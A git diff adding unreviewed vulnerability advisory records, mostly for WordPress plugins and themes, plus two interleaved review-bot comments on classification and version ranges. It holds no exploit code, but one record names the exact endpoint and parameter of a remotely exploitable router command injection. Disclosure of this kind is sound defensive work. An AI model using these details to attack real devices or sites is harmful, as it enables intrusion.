+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68534"
+ ],
+ "details": "Missing Authorization vulnerability in add-ons.org PDF for WPForms pdf-for-wpforms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PDF for WPForms: from n/a through <= 6.3.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68534"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/pdf-for-wpforms/vulnerability/wordpress-pdf-for-wpforms-plugin-6-3-0-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jhr5-g8vv-6x3q/GHSA-jhr5-g8vv-6x3q.json b/advisories/unreviewed/2026/02/GHSA-jhr5-g8vv-6x3q/GHSA-jhr5-g8vv-6x3q.json
new file mode 100644
index 0000000000000..7fec7a156abfc
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jhr5-g8vv-6x3q/GHSA-jhr5-g8vv-6x3q.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jhr5-g8vv-6x3q",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67973"
+ ],
+ "details": "Missing Authorization vulnerability in sunshinephotocart Sunshine Photo Cart sunshine-photo-cart allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sunshine Photo Cart: from n/a through <= 3.5.6.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67973"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/sunshine-photo-cart/vulnerability/wordpress-sunshine-photo-cart-plugin-3-5-6-2-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jjpv-2mhh-mcmm/GHSA-jjpv-2mhh-mcmm.json b/advisories/unreviewed/2026/02/GHSA-jjpv-2mhh-mcmm/GHSA-jjpv-2mhh-mcmm.json
new file mode 100644
index 0000000000000..c0ef1a9fa90c3
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jjpv-2mhh-mcmm/GHSA-jjpv-2mhh-mcmm.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jjpv-2mhh-mcmm",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67995"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in LoftOcean PatioTime patiotime allows Object Injection.This issue affects PatioTime: from n/a through < 2.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67995"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/patiotime/vulnerability/wordpress-patiotime-theme-2-1-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jvrv-rj6m-mfm6/GHSA-jvrv-rj6m-mfm6.json b/advisories/unreviewed/2026/02/GHSA-jvrv-rj6m-mfm6/GHSA-jvrv-rj6m-mfm6.json
new file mode 100644
index 0000000000000..0518e9393286a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jvrv-rj6m-mfm6/GHSA-jvrv-rj6m-mfm6.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jvrv-rj6m-mfm6",
+ "modified": "2026-02-20T18:31:37Z",
+ "published": "2026-02-20T18:31:37Z",
+ "aliases": [
+ "CVE-2025-69381"
+ ],
+ "details": "Missing Authorization vulnerability in vanquish WooCommerce Bulk Product Editor woocommerce-quick-product-editor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Bulk Product Editor: from n/a through <= 3.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69381"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-quick-product-editor/vulnerability/wordpress-woocommerce-bulk-product-editor-plugin-3-0-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:22Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jw2g-7q64-j48j/GHSA-jw2g-7q64-j48j.json b/advisories/unreviewed/2026/02/GHSA-jw2g-7q64-j48j/GHSA-jw2g-7q64-j48j.json
index 041bee78dee07..b0c8ea1803580 100644
--- a/advisories/unreviewed/2026/02/GHSA-jw2g-7q64-j48j/GHSA-jw2g-7q64-j48j.json
+++ b/advisories/unreviewed/2026/02/GHSA-jw2g-7q64-j48j/GHSA-jw2g-7q64-j48j.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-jw2g-7q64-j48j",
- "modified": "2026-02-19T21:30:48Z",
+ "modified": "2026-02-20T18:31:32Z",
 "published": "2026-02-19T21:30:48Z",
 "aliases": [
 "CVE-2026-27440"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Saad Iqbal myCred mycred allows Stored XSS.This issue affects myCred: from n/a through <= 2.9.7.6.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T21:18:33Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-jw2x-9qxr-2w9w/GHSA-jw2x-9qxr-2w9w.json b/advisories/unreviewed/2026/02/GHSA-jw2x-9qxr-2w9w/GHSA-jw2x-9qxr-2w9w.json
new file mode 100644
index 0000000000000..24e7485a57c70
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jw2x-9qxr-2w9w/GHSA-jw2x-9qxr-2w9w.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jw2x-9qxr-2w9w",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-2847"
+ ],
+ "details": "A vulnerability was detected in UTT HiPER 520 1.7.7-160105. Affected is the function sub_44EFB4 of the file /goform/formReleaseConnect of the component Web Management Interface. The manipulation of the argument Isp_Name results in os command injection. The attack can be launched remotely. The exploit is now public and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2847"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cha0yang1/UTT520CVE/blob/main/UTTRCE2.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347083"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347083"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.753965"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-77"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json b/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json
new file mode 100644
index 0000000000000..80b8de848cb63
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json
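Review bot: The `cwe_ids` entry in GHSA-jw2x-9qxr-2w9w is `"CWE-77"`, while the `details` text describes OS command injection through the `Isp_Name` argument, for which CWE-78 is the more specific class; if upstream agrees, the entry would read `"CWE-78"`. The record also ships with `"affected": []`, so tooling that matches on package ranges cannot flag this device, and triage has to rely on the firmware version named in `details`. Since the description states that an exploit is public, the classification is worth correcting at the source feed rather than in this synced file.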
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jxq5-ggfq-q36w",
+ "modified": "2026-02-20T18:31:37Z",
+ "published": "2026-02-20T18:31:37Z",
+ "aliases": [
+ "CVE-2025-69386"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realvirtualmx RVCFDI para Woocommerce rvcfdi-para-woocommerce allows Reflected XSS.This issue affects RVCFDI para Woocommerce: from n/a through <= 8.1.8.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69386"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/rvcfdi-para-woocommerce/vulnerability/wordpress-rvcfdi-para-woocommerce-plugin-8-1-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:23Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json b/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json
new file mode 100644
index 0000000000000..64d787ad2ebd5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m23x-mm6q-4qg4",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22364"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes SevenTrees seventrees allows PHP Local File Inclusion.This issue affects SevenTrees: from n/a through <=1.0.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22364"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/seventrees/vulnerability/wordpress-seventrees-theme-1-0-2-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:35Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-m69x-7wp8-6gjv/GHSA-m69x-7wp8-6gjv.json b/advisories/unreviewed/2026/02/GHSA-m69x-7wp8-6gjv/GHSA-m69x-7wp8-6gjv.json
new file mode 100644
index 0000000000000..09804306dc559
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m69x-7wp8-6gjv/GHSA-m69x-7wp8-6gjv.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m69x-7wp8-6gjv",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69378"
+ ],
+ "details": "Incorrect Privilege Assignment vulnerability in XforWooCommerce Product Filter for WooCommerce prdctfltr allows Privilege Escalation.This issue affects Product Filter for WooCommerce: from n/a through <= 9.1.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69378"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/prdctfltr/vulnerability/wordpress-product-filter-for-woocommerce-plugin-9-1-2-privilege-escalation-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-266"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:22Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json b/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json
new file mode 100644
index 0000000000000..58423c0a7cd28
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m78j-wv7w-r94w",
+ "modified": "2026-02-20T18:31:33Z",
+ "published": "2026-02-20T18:31:33Z",
+ "aliases": [
+ "CVE-2025-53233"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RylanH Storyform storyform allows Reflected XSS.This issue affects Storyform: from n/a through <= 0.6.14.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53233"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/storyform/vulnerability/wordpress-storyform-plugin-0-6-14-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mgwj-pxgv-5r8r/GHSA-mgwj-pxgv-5r8r.json b/advisories/unreviewed/2026/02/GHSA-mgwj-pxgv-5r8r/GHSA-mgwj-pxgv-5r8r.json
new file mode 100644
index 0000000000000..68435d1d24d21
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mgwj-pxgv-5r8r/GHSA-mgwj-pxgv-5r8r.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mgwj-pxgv-5r8r",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-68024"
+ ],
+ "details": "Missing Authorization vulnerability in Addonify Addonify – WooCommerce Wishlist addonify-wishlist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Addonify – WooCommerce Wishlist: from n/a through <= 2.0.15.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68024"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/addonify-wishlist/vulnerability/wordpress-addonify-woocommerce-wishlist-plugin-2-0-15-settings-change-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mhqr-8rx2-jw82/GHSA-mhqr-8rx2-jw82.json b/advisories/unreviewed/2026/02/GHSA-mhqr-8rx2-jw82/GHSA-mhqr-8rx2-jw82.json
new file mode 100644
index 0000000000000..e15e3642af807
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mhqr-8rx2-jw82/GHSA-mhqr-8rx2-jw82.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mhqr-8rx2-jw82",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69365"
+ ],
+ "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Uroan Core uroan-core allows Blind SQL Injection.This issue affects Uroan Core: from n/a through <= 1.4.4.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69365"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/uroan-core/vulnerability/wordpress-uroan-core-plugin-1-4-4-sql-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:20Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json b/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json
new file mode 100644
index 0000000000000..100d5087ba629
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mhvh-7hfw-2pcj",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67984"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in calliko NPS computy nps-computy allows DOM-Based XSS.This issue affects NPS computy: from n/a through <= 2.8.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67984"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/nps-computy/vulnerability/wordpress-nps-computy-plugin-2-8-2-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mj24-8cx9-5wc8/GHSA-mj24-8cx9-5wc8.json b/advisories/unreviewed/2026/02/GHSA-mj24-8cx9-5wc8/GHSA-mj24-8cx9-5wc8.json
new file mode 100644
index 0000000000000..ba317956155c5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mj24-8cx9-5wc8/GHSA-mj24-8cx9-5wc8.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mj24-8cx9-5wc8",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-68032"
+ ],
+ "details": "Missing Authorization vulnerability in Passionate Brains Advanced WC Analytics advance-wc-analytics allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Advanced WC Analytics: from n/a through <= 3.19.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68032"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/advance-wc-analytics/vulnerability/wordpress-advanced-wc-analytics-plugin-3-18-0-settings-change-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mj7j-8qcf-454p/GHSA-mj7j-8qcf-454p.json b/advisories/unreviewed/2026/02/GHSA-mj7j-8qcf-454p/GHSA-mj7j-8qcf-454p.json
new file mode 100644
index 0000000000000..7accc09f2f64b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mj7j-8qcf-454p/GHSA-mj7j-8qcf-454p.json
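Review bot: In GHSA-mj24-8cx9-5wc8 the `details` field gives the affected range as `<= 3.19.0`, but the Patchstack reference on the second `"url"` line names version `3-18-0` in its slug; one of the two is presumably stale. With `"affected": []` there is no machine-readable range to fall back on, so anyone using this record to judge whether an installed Advanced WC Analytics version is exposed should confirm the upper bound against the Patchstack entry. The correction belongs upstream, since this file is synced rather than hand-edited.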
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mj7j-8qcf-454p",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-68050"
+ ],
+ "details": "Missing Authorization vulnerability in Leadpages Leadpages leadpages allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Leadpages: from n/a through <= 1.1.3.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68050"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/leadpages/vulnerability/wordpress-leadpages-plugin-1-1-3-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json b/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json
new file mode 100644
index 0000000000000..1616b0064619c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mj9g-3f37-7qv2",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-24950"
+ ],
+ "details": "Authorization Bypass Through User-Controlled Key vulnerability in themeplugs Authorsy authorsy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Authorsy: from n/a through <= 1.0.6.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24950"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/authorsy/vulnerability/wordpress-authorsy-plugin-1-0-6-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-639"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:39Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json b/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json
new file mode 100644
index 0000000000000..5bba14e15ed13
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mq7f-f783-pc94",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-24949"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods PhotoMe photome allows DOM-Based XSS.This issue affects PhotoMe: from n/a through <= 5.7.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24949"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/photome/vulnerability/wordpress-photome-theme-5-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:39Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json b/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json
new file mode 100644
index 0000000000000..d505c54d8ccaf
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mqj4-m7cg-hx46",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68501"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mollie Mollie Payments for WooCommerce mollie-payments-for-woocommerce allows Reflected XSS.This issue affects Mollie Payments for WooCommerce: from n/a through <= 8.1.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68501"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/mollie-payments-for-woocommerce/vulnerability/wordpress-mollie-payments-for-woocommerce-plugin-8-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mrcv-7mr4-vfm5/GHSA-mrcv-7mr4-vfm5.json b/advisories/unreviewed/2026/02/GHSA-mrcv-7mr4-vfm5/GHSA-mrcv-7mr4-vfm5.json
new file mode 100644
index 0000000000000..466e24c5dd517
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mrcv-7mr4-vfm5/GHSA-mrcv-7mr4-vfm5.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mrcv-7mr4-vfm5",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69372"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in AncoraThemes SevenHills sevenhills allows Object Injection.This issue affects SevenHills: from n/a through <= 1.6.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69372"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/sevenhills/vulnerability/wordpress-sevenhills-theme-1-6-2-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:21Z"
+ }
+}
\ No newline at end of file
